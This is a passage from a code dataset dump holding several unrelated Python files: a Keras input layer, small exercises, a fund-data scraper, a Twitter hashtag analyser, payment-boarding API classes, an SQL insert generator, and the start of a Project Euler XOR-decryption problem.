input_tensor: Optional tensor to use as layer input\n            instead of creating a placeholder.\n        sparse: Boolean, whether the placeholder created\n            is meant to be sparse.\n        name: Name of the layer (string).\n    \"\"\"\n\n    @interfaces.legacy_input_support\n    def __init__(self, input_shape=None, batch_size=None,\n                 batch_input_shape=None,\n                 dtype=None, input_tensor=None, sparse=False, name=None):\n        if not name:\n            prefix = 'input'\n            name = prefix + '_' + str(K.get_uid(prefix))\n        super(InputLayer, self).__init__(dtype=dtype, name=name)\n\n        self.trainable = False\n        self.built = True\n        self.sparse = sparse\n\n        if input_shape and batch_input_shape:\n            raise ValueError('Only provide the input_shape OR '\n                             'batch_input_shape argument to '\n                             'InputLayer, not both at the same time.')\n        if input_tensor is not None and batch_input_shape is None:\n            # If input_tensor is set, and batch_input_shape is not set:\n            # Attempt automatic input shape inference.\n            try:\n                batch_input_shape = K.int_shape(input_tensor)\n            except TypeError:\n                if not input_shape and not batch_input_shape:\n                    raise ValueError('InputLayer was provided '\n                                     'an input_tensor argument, '\n                                     'but its input shape cannot be '\n                                     'automatically inferred. 
'\n 'You should pass an input_shape or '\n 'batch_input_shape argument.')\n if not batch_input_shape:\n if not input_shape:\n raise ValueError('An Input layer should be passed either '\n 'a `batch_input_shape` or an `input_shape`.')\n else:\n batch_input_shape = (batch_size,) + tuple(input_shape)\n else:\n batch_input_shape = tuple(batch_input_shape)\n\n if not dtype:\n if input_tensor is None:\n dtype = K.floatx()\n else:\n dtype = K.dtype(input_tensor)\n\n self.batch_input_shape = batch_input_shape\n self.dtype = dtype\n\n if input_tensor is None:\n self.is_placeholder = True\n input_tensor = K.placeholder(shape=batch_input_shape,\n dtype=dtype,\n sparse=self.sparse,\n name=self.name)\n else:\n self.is_placeholder = False\n input_tensor._keras_shape = batch_input_shape\n # Create an input node to add to self.outbound_node\n # and set output_tensors' _keras_history.\n input_tensor._uses_learning_phase = False\n input_tensor._keras_history = (self, 0, 0)\n Node(self,\n inbound_layers=[],\n node_indices=[],\n tensor_indices=[],\n input_tensors=[input_tensor],\n output_tensors=[input_tensor],\n input_masks=[None],\n output_masks=[None],\n input_shapes=[batch_input_shape],\n output_shapes=[batch_input_shape])\n\n def get_config(self):\n config = {'batch_input_shape': self.batch_input_shape,\n 'dtype': self.dtype,\n 'sparse': self.sparse,\n 'name': self.name}\n return config\n\n\ndef Input(shape=None, batch_shape=None,\n name=None, dtype=None, sparse=False,\n tensor=None):\n \"\"\"`Input()` is used to instantiate a Keras tensor.\n\n A Keras tensor is a tensor object from the underlying backend\n (Theano, TensorFlow or CNTK), which we augment with certain\n attributes that allow us to build a Keras model\n just by knowing the inputs and outputs of the model.\n\n For instance, if a, b and c are Keras tensors,\n it becomes possible to do:\n `model = Model(input=[a, b], output=c)`\n\n The added Keras attributes are:\n `_keras_shape`: Integer shape tuple propagated\n via Keras-side shape inference.\n `_keras_history`: Last layer applied to the tensor.\n the entire layer graph is retrievable from that layer,\n recursively.\n\n # Arguments\n shape: A shape tuple (integer), not including the batch size.\n For instance, `shape=(32,)` indicates that the expected input\n will be batches of 32-dimensional vectors.\n batch_shape: A shape tuple (integer), including the batch size.\n For instance, `batch_shape=(10, 32)` indicates that\n the expected input will be batches of 10 32-dimensional vectors.\n `batch_shape=(None, 32)` indicates batches of an arbitrary number\n of 32-dimensional vectors.\n name: An optional name string for the layer.\n Should be unique in a model (do not reuse the same name twice).\n It will be autogenerated if it isn't provided.\n dtype: The data type expected by the input, as a string\n (`float32`, `float64`, `int32`...)\n sparse: A boolean specifying whether the placeholder\n to be created is sparse.\n tensor: Optional existing tensor to wrap into the `Input` layer.\n If set, the layer will not create a placeholder tensor.\n\n # Returns\n A tensor.\n\n # Example\n\n ```python\n # this is a logistic regression in Keras\n x = Input(shape=(32,))\n y = Dense(16, activation='softmax')(x)\n model = Model(x, y)\n ```\n \"\"\"\n if not batch_shape and tensor is None:\n assert shape is not None, ('Please provide to Input either a `shape`'\n ' or a `batch_shape` argument. 
Note that '\n                                   '`shape` does not include the batch '\n                                   'dimension.')\n    if shape is not None and not batch_shape:\n        batch_shape = (None,) + tuple(shape)\n    if not dtype:\n        dtype = K.floatx()\n    input_layer = InputLayer(batch_input_shape=batch_shape,\n                             name=name, dtype=dtype,\n                             sparse=sparse,\n                             input_tensor=tensor)\n    # Return tensor including _keras_shape and _keras_history.\n    # Note that in this case train_output and test_output are the same pointer.\n    outputs = input_layer._inbound_nodes[0].output_tensors\n    if len(outputs) == 1:\n        return outputs[0]\n    else:\n        return outputs\n","sub_path":"deep_learning/keras/keras/engine/input_layer.py","file_name":"input_layer.py","file_ext":"py","file_size_in_byte":7462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472242346","text":"''' \n4)Given the participants' score sheet for your University Sports Day, you are required to find the runner-up score.\n   You are given n scores. Store them in a list and find the score of the runner-up.\n   Input Format: The first line contains n . The second line contains an array A[]  of n integers each separated by a space.\n   Constraints : 2≤n≤5\n                 -100≤A[i]≤100\n   Output Format : Print the runner-up score.\n   Sample Input : 5\n                  2 3 6 6 5\n   Sample Output : 5\n   '''\n\nn = int(input(\"Enter limit : \"))\nprint(\"Enter array elements : \")\na = []\nif(2 <= n and n <= 5):\n    a = [int(x) for x in input().split(\" \")]\n\n# way 1 - using set to find second runner-up\ns = sorted(set(a))  # sets are unordered and drop duplicates, so sort first\nprint(s[-2])\n\n# way 2 - using sort() function\na.sort()\nprint(a[-2])\n\n# way 3 - using manual code\n\nmax = max(a[0], a[1])\nsecmax = min(a[0], a[1])\nfor i in range(2, len(a)):\n    if(a[i] > max):\n        secmax = max\n        max = a[i]\n    elif(a[i] > secmax and max != a[i]):\n        secmax = a[i]\nprint(secmax)\n","sub_path":"Day2_Assignments/qn4.py","file_name":"qn4.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215633264","text":"import requests\nimport json\nimport time\nimport sqlite3\nfrom tqdm import tqdm\nfrom openpyxl import Workbook\nimport sys\n# browser request headers\nheaders = {\n    \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n    \"Accept-Encoding\": \"gzip, deflate\",\n    \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n    \"Connection\": \"keep-alive\",\n    \"Content-Length\": \"2\",\n    \"Content-Type\": \"application/json\",\n    \"Host\": \"gs.amac.org.cn\",\n    \"Origin\": \"http://gs.amac.org.cn\",\n    \"Referer\": \"http://gs.amac.org.cn/amac-infodisc/res/pof/manager/index.html\",\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER\",\n    \"X-Requested-With\": \"XMLHttpRequest\"\n}\n\nrequest_params = {}  # the JSON request body sent directly to the server, so it has to be serialized first; JSON, the usual serialization standard for web transfer, is used\n\n\n# build the parameters that are POSTed to the server for each page\ndef get_post_params(page):\n    post_params = {\n        'rand': '0.034480063759529056',\n        'page': page,\n        'size': '20'\n    }  # if these request parameters appeared in the address bar, they would have to be encoded with urlencode\n    return post_params\n\n\n# fetch the key information of each page, to be appended to Excel\ndef iter_list_values(post_params):\n    response = requests.post('http://gs.amac.org.cn/amac-infodisc/api/pof/manager?', params=post_params,\n                             data=json.dumps(request_params), headers=headers)  # JSON request: params are the query parameters, data is the JSON body\n    for i in range(20):\n        list_values = [json.loads(response.text)['content'][i][x] for x in\n                       'managerName fundScale fundCount officeAddress officeProvince primaryInvestType'.split()]\n        yield list_values\n
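\n# A quick way to eyeball one page of results (illustrative snippet, not part\n# of the original script):\n#   for row in iter_list_values(get_post_params(0)):\n#       print(row)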
\n# write the crawled records into the database\ndef create_table():\n    global creat_table_sql, i, post_params, iter_list_val\n    with db_connection:\n        creat_table_sql = \"\"\"CREATE TABLE IF NOT EXISTS %s (公司名称 TEXT, 管理规模 FLOAT, 产品数量 INT, 办公地址 TEXT, 省份 TEXT, 牌照类型 TEXT)\"\"\" % table_time_str\n        db_connection.execute(creat_table_sql)\n        # iter_list_val = iter_list_values(post_params=get_post_params(pages))  # iterator over the entries of one page\n        for i in tqdm(range(pages)):  # fetch the entries of all 1211 pages\n            post_params = get_post_params(i)\n            iter_list_val = iter_list_values(post_params)\n            db_connection.executemany(\"INSERT INTO %s VALUES(?,?,?,?,?,?)\" % table_time_str, iter_list_val)\n        # count = db_connection.execute('SELECT count(*) FROM %s' % table_time_str).fetchall()[0][0]\n        # print('fetched %s records this time'%count)\n\n\ndef export_to_excel():\n    global run_click\n    export_excel = '日期' + str(run_click)\n    db_connection = sqlite3.connect('./simu2.db')\n    table_names = db_connection.execute(\n        \"\"\"SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name\"\"\").fetchall()\n    try:\n        table_names_list = [x[0] for x in table_names]  # succeeds if the list comprehension raises no index error\n    except:\n        print('There are no tables in the database!')\n    else:\n        if export_excel in table_names_list:\n            wb = Workbook()\n            sheet = wb.active\n            sheet.column_dimensions['A'].width = 50\n            sheet.column_dimensions['B'].width = 12\n            sheet.column_dimensions['C'].width = 9\n            sheet.column_dimensions['D'].width = 70\n            sheet.column_dimensions['E'].width = 8\n            sheet.column_dimensions['F'].width = 30\n            table_head = ['公司名称', '管理规模', '产品数量', '办公地址', '省份', '牌照类型']\n            sheet.append(table_head)\n            data = db_connection.execute('SELECT * FROM %s' % export_excel)\n            print('Exporting to Excel, please wait...')\n            for i in tqdm(data):\n                sheet.append(i)\n            wb.save(export_excel + '.xlsx')\n            print('Export finished, the file is named \"%s.xlsx\"'%export_excel)\n        else:\n            print('No table named \"%s\" exists! The exportable tables are: %s' % (export_excel, table_names_list))\n\n\n# main routine\nif __name__ == '__main__':\n    run_click = input('Press Enter to start fetching the latest data. To export the data of a given day, type its date (e.g. 20181105) and press Enter: ')\n\n    t_start = time.clock()\n\n    if run_click:\n        export_to_excel()\n    else:\n        pages = 1211\n        table_time_str = \"日期\"+time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n        db_connection = sqlite3.connect('./simu2.db')\n        table_names = db_connection.execute(\"\"\"SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name\"\"\").fetchall()  # returns a list whose elements are tuples\n        try:\n            table_names_list = [x[0] for x in table_names ]  # succeeds if no index error is raised\n        except:  # if it raises, no table has ever been created, so create the database table\n            print('Creating the database table...')\n            create_table()\n        else:  # otherwise the database does contain tables; still check whether today's table already exists\n            if table_time_str not in table_names_list:\n                create_table()\n            else:\n                print('A table named \"%s\" already exists in the database!'%table_time_str)\n                re_run_programs = input('To overwrite the table generated today, type yes and press Enter: ')\n                if re_run_programs =='yes':\n                    db_connection.execute('drop TABLE %s'%table_time_str)\n                    db_connection.commit()\n                    create_table()\n    t_end = time.clock()\n    t =int(t_end-t_start)\n    print('Task finished, took %s seconds...'%t)\n    quit_program = input('Press Enter to exit the program...')\n    if quit_program == \"\":\n        sys.exit()\n\n\n\n","sub_path":"aiohttp_test/funds_get_db.py","file_name":"funds_get_db.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504812572","text":"#########################################\n##### Name: rui sun            #####\n##### Uniqname: rayss      #####\n#########################################\n\nfrom requests_oauthlib import OAuth1\nimport json\nimport requests\nimport csv\n\nimport hw6_secrets_starter as secrets # file that contains your OAuth credentials\n\nCACHE_FILENAME = \"twitter_cache.json\"\nCACHE_DICT = {}\n\nclient_key 
= secrets.TWITTER_API_KEY\nclient_secret = secrets.TWITTER_API_SECRET\naccess_token = secrets.TWITTER_ACCESS_TOKEN\naccess_token_secret = secrets.TWITTER_ACCESS_TOKEN_SECRET\n\noauth = OAuth1(client_key,\n client_secret=client_secret,\n resource_owner_key=access_token,\n resource_owner_secret=access_token_secret)\n\ndef open_stop_word():\n with open('stop-word-list.csv', newline='') as csvfile:\n stop_word = list(csv.reader(csvfile, delimiter=','))\n stop_word = stop_word[0]\n result = []\n for word in stop_word:\n result.append(word.strip())\n result.append('rt')\n\n return result\n\ndef test_oauth():\n ''' Helper function that returns an HTTP 200 OK response code and a \n representation of the requesting user if authentication was \n successful; returns a 401 status code and an error message if \n not. Only use this method to test if supplied user credentials are \n valid. Not used to achieve the goal of this assignment.'''\n\n url = \"https://api.twitter.com/1.1/account/verify_credentials.json\"\n auth = OAuth1(client_key, client_secret, access_token, access_token_secret)\n authentication_state = requests.get(url, auth=auth)#.json()\n return authentication_state\n\n\ndef open_cache():\n ''' Opens the cache file if it exists and loads the JSON into\n the CACHE_DICT dictionary.\n if the cache file doesn't exist, creates a new cache dictionary\n \n Parameters\n ----------\n None\n \n Returns\n -------\n The opened cache: dict\n '''\n try:\n cache_file = open(CACHE_FILENAME, 'r')\n cache_contents = cache_file.read()\n cache_dict = json.loads(cache_contents)\n cache_file.close()\n except:\n cache_dict = {}\n return cache_dict\n\n\ndef save_cache(cache_dict):\n ''' Saves the current state of the cache to disk\n \n Parameters\n ----------\n cache_dict: dict\n The dictionary to save\n \n Returns\n -------\n None\n '''\n dumped_json_cache = json.dumps(cache_dict)\n fw = open(CACHE_FILENAME,\"w\")\n fw.write(dumped_json_cache)\n fw.close() \n\n\ndef construct_unique_key(baseurl, params):\n ''' constructs a key that is guaranteed to uniquely and \n repeatably identify an API request by its baseurl and params\n\n AUTOGRADER NOTES: To correctly test this using the autograder, use an underscore (\"_\") \n to join your baseurl with the params and all the key-value pairs from params\n E.g., baseurl_key1_value1\n \n Parameters\n ----------\n baseurl: string\n The URL for the API endpoint\n params: dict\n A dictionary of param:value pairs\n \n Returns\n -------\n string\n the unique key as a string\n '''\n s = baseurl\n for key, val in params.items():\n s = s + '_' + str(key).lower() + '_' + str(val).lower()\n \n return s\n\ndef make_request(baseurl, params):\n '''Make a request to the Web API using the baseurl and params\n \n Parameters\n ----------\n baseurl: string\n The URL for the API endpoint\n params: dictionary\n A dictionary of param:value pairs\n \n Returns\n -------\n dict\n the data returned from making the request in the form of \n a dictionary\n '''\n response = requests.get(baseurl, \n params=params, \n auth=oauth)\n\n results = response.json()\n return results\n \ndef make_request_with_cache(baseurl, hashtag, count):\n '''Check the cache for a saved result for this baseurl+params:values\n combo. If the result is found, return it. 
Otherwise send a new \n    request, save it, then return it.\n\n    AUTOGRADER NOTES: To test your use of caching in the autograder, please do the following:\n    If the result is in your cache, print \"fetching cached data\"\n    If you request a new result using make_request(), print \"making new request\"\n\n    Do not include the print statements in your return statement. Just print them as appropriate.\n    This, of course, does not ensure that you correctly retrieved that data from your cache, \n    but it will help us to see if you are appropriately attempting to use the cache.\n    \n    Parameters\n    ----------\n    baseurl: string\n        The URL for the API endpoint\n    hashtag: string\n        The hashtag to search for\n    count: integer\n        The number of results you request from Twitter\n    \n    Returns\n    -------\n    dict\n        the results of the query as a dictionary loaded from cache\n        JSON\n    '''\n    params = {'q': hashtag, 'count': count}\n    request_key = construct_unique_key(baseurl, params)\n    results = open_cache()\n    for key, val in results.items():\n        if key == 'request_key' and val == request_key:\n            print('fetching cached data')\n            return results\n\n    results = make_request(baseurl, params)\n    print(\"making new request\")\n    results['request_key'] = request_key\n    save_cache(results)\n    return results\n    \n\n\ndef find_most_common_cooccurring_hashtag(tweet_data, hashtag_to_ignore):\n    ''' Finds the hashtag that most commonly co-occurs with the hashtag\n    queried in make_request_with_cache().\n\n    Parameters\n    ----------\n    tweet_data: dict\n        Twitter data as a dictionary for a specific query\n    hashtag_to_ignore: string\n        the same hashtag that is queried in make_request_with_cache() \n        (e.g. \"#MarchMadness2021\")\n\n    Returns\n    -------\n    list\n        the top 3 hashtags that co-occur with the hashtag \n        queried in make_request_with_cache()\n\n    '''\n    results = tweet_data['statuses']\n    hashtags = {}\n    for result in results:\n        if result['entities']['hashtags'] is not None:\n            for hashtag in result['entities']['hashtags']:\n                if ((hashtag_to_ignore[1:].lower() in hashtag['text'].lower()) or (hashtag['text'].lower() in hashtag_to_ignore[1:].lower())):\n                    pass\n                else:\n                    if hashtag['text'].lower() in list(hashtags.keys()):\n                        hashtags[hashtag['text'].lower()] += 1\n                    else:\n                        hashtags[hashtag['text'].lower()] = 1\n\n    cooccur_hashtag = []\n    for i in range(3):\n        num = 0\n        for key, val in hashtags.items():\n            if val > num:\n                num = val\n                top_hashtag = key\n        if num == 0:\n            break\n        cooccur_hashtag.append('#'+top_hashtag)\n        del hashtags[top_hashtag]\n\n    return cooccur_hashtag\n\ndef find_most_common_occurring_words(tweet_data):\n    results = tweet_data['statuses']\n    words_dict = {}\n    stop_word = open_stop_word()\n    for result in results:\n        if result['text'] is not None:\n            words = result['text'].split(' ')\n            for word in words:\n                if word == '':\n                    continue\n                if (word.lower() in stop_word) or word[0] == '#':\n                    pass\n                else:\n                    if word.lower() in list(words_dict.keys()):\n                        words_dict[word.lower()] += 1\n                    else:\n                        words_dict[word.lower()] = 1\n\n\n    cooccur_words = {}\n    for i in range(10):\n        num = 0\n        for key, val in words_dict.items():\n            if val > num:\n                num = val\n                top_word = key\n        if num == 0:\n            break\n        cooccur_words[top_word] = num\n        del words_dict[top_word]\n\n    return cooccur_words\n
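\n# Rough shape of the two helpers' return values (illustrative, not real output):\n#   find_most_common_cooccurring_hashtag(...) -> ['#tag1', '#tag2', '#tag3']\n#   find_most_common_occurring_words(...)     -> {'word1': 12, 'word2': 9, ...}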
exit()\n print(test_oauth())\n\n CACHE_DICT = open_cache()\n\n baseurl = \"https://api.twitter.com/1.1/search/tweets.json\"\n while(True):\n hashtag = input(\"What hashtag you want to search? \")\n if hashtag == 'exit':\n break\n else:\n hashtag = '#' + hashtag\n count = 100\n\n tweet_data = make_request_with_cache(baseurl, hashtag, count)\n top_three_cooccurring_hashtag = find_most_common_cooccurring_hashtag(tweet_data, hashtag)\n if top_three_cooccurring_hashtag == []:\n print(\"There are no coocurring hashtags\")\n else:\n print(\"The top three cooccurring hashtag with {} is {}.\".format(hashtag, top_three_cooccurring_hashtag))\n\n top_ten_occuring_words = find_most_common_occurring_words(tweet_data)\n if top_ten_occuring_words == {}:\n print(\"There are no occuring words\")\n else:\n print(\"The top ten occurring words with {} is shown below along with the frequency.\".format(hashtag))\n i = 1\n for key, val in top_ten_occuring_words.items():\n print(f'{i}: {key} occurs {val} times')\n i += 1","sub_path":"hw5-twitter-ec.py","file_name":"hw5-twitter-ec.py","file_ext":"py","file_size_in_byte":9444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231702731","text":"# -*- coding:utf-8 -*-\n\n\nclass Solution:\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0:\n return False\n\n temp = x\n rev = 0\n while temp > 0:\n rev = rev * 10 + temp % 10\n temp = temp // 10\n\n if rev == x:\n return True\n return False\n\n\nif __name__ == \"__main__\":\n x = 110\n print(Solution.isPalindrome(None, x))\n","sub_path":"0009.pn.py","file_name":"0009.pn.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"254569440","text":"def create_monster(name, species):\n monster = {\n 'name': name,\n 'species': species,\n }\n\n monster['hit_points'] = initial_hit_points(monster)\n return monster\n\n\ndef describe(monster):\n if monster['hit_points'] > 0:\n print('{} is a {} with {} hit points'.format(monster['name'], monster['species'], monster['hit_points']))\n else:\n print('{} is a dead {}'.format(monster['name'], monster['species']))\n\n\ndef damage(monster, damage_points):\n if monster['hit_points'] > 0:\n monster['hit_points'] -= damage_points\n if monster['hit_points'] <= 0:\n print('{} is dead'.format(monster['name']))\n else:\n print('{} is already dead'.format(monster['name']))\n\n\ndef heal(monster):\n if monster['hit_points'] > 0:\n monster['hit_points'] = initial_hit_points(monster)\n else:\n print('A dead monster cannot be healed')\n\n\ndef initial_hit_points(monster):\n if monster['species'] == 'Giant':\n return 10\n elif monster['species'] == 'Dragon':\n return 20\n elif monster['species'] == 'Wyvern':\n return 15\n else:\n # This is a way of telling Python \"this should never happen\"\n assert False\n\n\ndef attack(monster, other_monster):\n if monster['hit_points'] > 0:\n print('{} attacks {}'.format(monster['name'], other_monster['name']))\n damage(other_monster, attack_points(monster))\n else:\n print('A dead monster cannot attack')\n\n\ndef attack_points(monster):\n if monster['species'] == 'Giant':\n return 3\n elif monster['species'] == 'Dragon':\n return 4\n elif monster['species'] == 'Wyvern':\n return 5\n else:\n assert False\n\n\nif __name__ == '__main__':\n gerald = create_monster('Gerald', 'Giant')\n debbie = create_monster('Debbie', 'Dragon')\n wallace = create_monster('Wallace', 'Wyvern')\n\n 
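# --- Editor's example (hypothetical, not part of the dataset): the integer-
# palindrome record above reverses every digit. A standard constant-space
# refinement reverses only half the digits and compares the two halves.
def is_palindrome(x: int) -> bool:
    # Negatives, and multiples of 10 other than 0, can never be palindromes.
    if x < 0 or (x % 10 == 0 and x != 0):
        return False
    rev = 0
    while x > rev:  # stop once rev holds at least half of the digits
        rev = rev * 10 + x % 10
        x //= 10
    return x == rev or x == rev // 10  # odd digit counts drop the middle digit

assert is_palindrome(121) and not is_palindrome(110)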
describe(gerald)\n describe(debbie)\n attack(debbie, gerald)\n attack(gerald, debbie)\n attack(debbie, gerald)\n attack(gerald, debbie)\n attack(debbie, gerald)\n attack(gerald, debbie)\n describe(gerald)\n describe(debbie)\n","sub_path":"monsters02.py","file_name":"monsters02.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309098463","text":"from . .Request import Request\nfrom .schemas import (CreateLegalEntitySchema, CreateSubMerchantSchema,\n RetrieveLegalEntitySchema, RetrieveMccListSchema,\n RetrieveSubMerchantSchema, UpdateLegalEntitySchema,\n UpdateSubMerchantSchema)\n\n\nclass CreateLegalEntity (Request):\n __schema__ = CreateLegalEntitySchema\n\n Address = None\n Credentials = None\n LegalEntity = None\n Principal = None\n PrincipalArray = None\n\n def __init__(self):\n super(CreateLegalEntity, self).__init__(\"boarding\",\n \"services\",\n \"createLegalEntity\",\n \"POST\")\n\n\nclass CreateSubMerchant (Request):\n __schema__ = CreateSubMerchantSchema\n\n Address = None\n Credentials = None\n ECheck = None\n Merchant = None\n PrimaryContact = None\n SubMerchantFunding = None\n\n def __init__(self, entityID):\n super(CreateSubMerchant, self).__init__(\"boarding\",\n \"services\",\n \"createSubMerchant\",\n \"POST\")\n self.queryParams['entityID'] = entityID\n\n\nclass RetrieveLegalEntity (Request):\n __schema__ = RetrieveLegalEntitySchema\n\n def __init__(self, entityID):\n super(RetrieveLegalEntity, self).__init__(\"boarding\",\n \"services\",\n \"retrieveLegalEntity\",\n \"GET\")\n self.queryParams['entityID'] = entityID\n\n\nclass RetrieveMccList (Request):\n __schema__ = RetrieveMccListSchema\n\n def __init__(self):\n super(RetrieveMccList, self).__init__(\"boarding\",\n \"services\",\n \"retrieveMccList\",\n \"GET\")\n\n\nclass RetrieveSubMerchant (Request):\n __schema__ = RetrieveSubMerchantSchema\n\n def __init__(self, entityID, subMerchantID):\n super(RetrieveSubMerchant, self).__init__(\"boarding\",\n \"services\",\n \"retrieveSubMerchant\",\n \"GET\")\n self.queryParams['entityID'] = entityID\n self.queryParams['subMerchantID'] = subMerchantID\n\n\nclass UpdateLegalEntity (Request):\n __schema__ = UpdateLegalEntitySchema\n\n Address = None\n BackgroundCheckFields = None\n Credentials = None\n LegalEntity = None\n Principal = None\n PrincipalArray = None\n\n def __init__(self, entityID):\n super(UpdateLegalEntity, self).__init__(\"boarding\",\n \"services\",\n \"updateLegalEntity\",\n \"PUT\")\n self.queryParams['entityID'] = entityID\n\n\nclass UpdateSubMerchant (Request):\n __schema__ = UpdateSubMerchantSchema\n\n Address = None\n Credentials = None\n ECheck = None\n Merchant = None\n PrimaryContact = None\n SubMerchantFunding = None\n\n def __init__(self, entityID, subMerchantID):\n super(UpdateSubMerchant, self).__init__(\"boarding\",\n \"services\",\n \"updateSubMerchant\",\n \"PUT\")\n self.queryParams['entityID'] = entityID\n self.queryParams['subMerchantID'] = subMerchantID\n","sub_path":"vantiv/request/boarding/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567171809","text":"from __future__ import print_function\nimport os\nimport sys\n\n'''\nINSERT INTO table_name ( field1, field2,...fieldN )\n VALUES\n ( value1, value2,...valueN );\n'''\n\ndef insert(table, qfields, qval):\n qfile = open(\"query.sql\", \"a\")\n qstring = 
\"INSERT INTO \"+table+\" \"+\" (\"+qfields+\") VALUES (\"+qval+\");\"\n qfile.write(qstring+\"\\n\")\n qfile.close()\n\n\ndef readfile(fname, facname):\n f = open(fname,'r');\n line = f.readline()\n line.strip()\n qfields = \"\"\n qval = \"\"\n name = \"\"\n while(line!=''):\n if(\"$\" in line):\n valtoinsert = line.split('$')[1]\n valtoinsert = valtoinsert.rstrip(\"\\n\")\n if(\"PUBLICATIONS\" in line or \"AWARDS\" in line):\n break\n if(\"NAME\" in line):\n qfields = qfields + \"name\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n name = valtoinsert\n if(\"DESG\" in line):\n qfields = qfields + \"designation\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"WEB\" in line):\n qfields = qfields + \"website\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"EMAIL\" in line):\n qfields = qfields + \"email\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"PHONE\" in line):\n qfields = qfields + \"phone\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"RESP\" in line):\n qfields = qfields + \"responsibility\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n if(\"RESAREA\" in line):\n qfields = qfields + \"research_area\" + \",\"\n qval = qval + \"'\" + valtoinsert + \"',\"\n line = f.readline() \n qval = qval[:-1]\n qfields = qfields[:-1]\n insert(\"info\", qfields, qval)\n \n if(\"AWARDS\" in line):\n qfields = \"\"\n qval = \"\"\n qfields = \"name, award\"\n line = f.readline()\n award = line.rstrip('\\r\\n')\n qval = qval + \"'\" + name + \"','\" + award + \"'\"\n insert(\"awards\", qfields, qval)\n line = f.readline()\n \n qfields = \"\"\n qval = \"\"\n if(\"PUBLICATIONS\" in line):\n line = f.readline() #Advance one line after publication\n ''' Insert publications '''\n qfields = \"name, year, title\"\n while(line!=''):\n if('PROJECTS' in line or 'STUDENTS' in line):\n break\n year = int(line)\n title = f.readline()\n tile = title.rstrip('\\r\\n')\n f.readline()\n qval = \"\"\n qval = qval + \"'\" + name + \"',\"\n qval = qval + str(year) + \",\" \n qval = qval + \"'\" + title[:-1] + \"',\"\n qval = qval[:-1]\n insert(\"publications\", qfields, qval)\n line = f.readline()\n\n qval = \"\"\n qfields = \"name, title\"\n line = f.readline()\n while(line!=''):\n if('STUDENTS' in line):\n break\n title = line.rstrip('\\r\\n')\n qval = \"\"\n qval = qval + \"'\" + name + \"',\"\n qval = qval + \"'\" + title + \"',\"\n qval = qval[:-1]\n insert(\"projects\", qfields, qval)\n line = f.readline()\n if(line[0] == '\\n'):\n line = f.readline()\n \n qval = \"\"\n qfields = \"name, student_name, student_type, student_research_area\"\n line = f.readline()\n student_type = line.rstrip('\\r\\n')\n \n while(line!=''):\n if('STUDENTS' in line):\n student_type = line.rstrip('\\r\\n')\n line = f.readline()\n line = line.rstrip('\\r\\n')\n if('Area of Research:' in line):\n splitname = line.split('Area of Research:')\n student_name = splitname[0]\n r_area = splitname[1].rstrip('\\n\\r')\n else: \n student_name = line\n r_area = \"\"\n qval = \"\"\n qval = qval + \"'\" + name + \"',\"\n qval = qval + \"'\" + student_name + \"',\"\n qval = qval + \"'\" + student_type + \"',\"\n qval = qval + \"'\" + r_area + \"',\"\n qval = qval[:-1]\n insert(\"students\", qfields, qval)\n line = f.readline()\n if(line[0] == '\\n'):\n line = f.readline()\n\n\ndeletestring = \"delete from info where 1;\\ndelete from publications where 1;\\ndelete from students where 1;\\ndelete from projects where 1;\\ndelete from awards where 1;\\n\"\n\ndef main():\n 
#os.remove(\"query.sql\")\n qfile = open(\"query.sql\", \"w\")\n qfile.write(deletestring)\n qfile.close()\n files = os.listdir(\"./databaseinp\")\n for fname in files:\n readfile(\"./databaseinp/\"+fname, fname)\n\n\nif __name__=='__main__':\n main()","sub_path":"insertdb.py","file_name":"insertdb.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"303449504","text":"import string\nimport unittest\n\nfrom library.common import Common\nfrom library.permutations import Permutations\n\n\"\"\"\nXOR decryption\n\nEach character on a computer is assigned a unique code and the preferred standard is ASCII \n(American Standard Code for Information Interchange). \nFor example, uppercase A = 65, asterisk (*) = 42, and lowercase k = 107.\nA modern encryption method is to take a text file, convert the bytes to ASCII, then XOR each byte with a given value, \ntaken from a secret key. The advantage with the XOR function is that using the same encryption key on the cipher text, \nrestores the plain text; for example, 65 XOR 42 = 107, then 107 XOR 42 = 65.\nFor unbreakable encryption, the key is the same length as the plain text message, \nand the key is made up of random bytes. \nThe user would keep the encrypted message and the encryption key in different locations, and without both \"halves\", \nit is impossible to decrypt the message.\nUnfortunately, this method is impractical for most users, so the modified method is to use a password as a key. \nIf the password is shorter than the message, which is likely, the key is repeated cyclically throughout the message. \nThe balance for this method is using a sufficiently long password key for security, but short enough to be memorable.\nYour task has been made easy, as the encryption key consists of three lower case characters. \nUsing p059_cipher.txt (right click and 'Save Link/Target As...'), a file containing the encrypted ASCII codes, \nand the knowledge that the plain text must contain common English 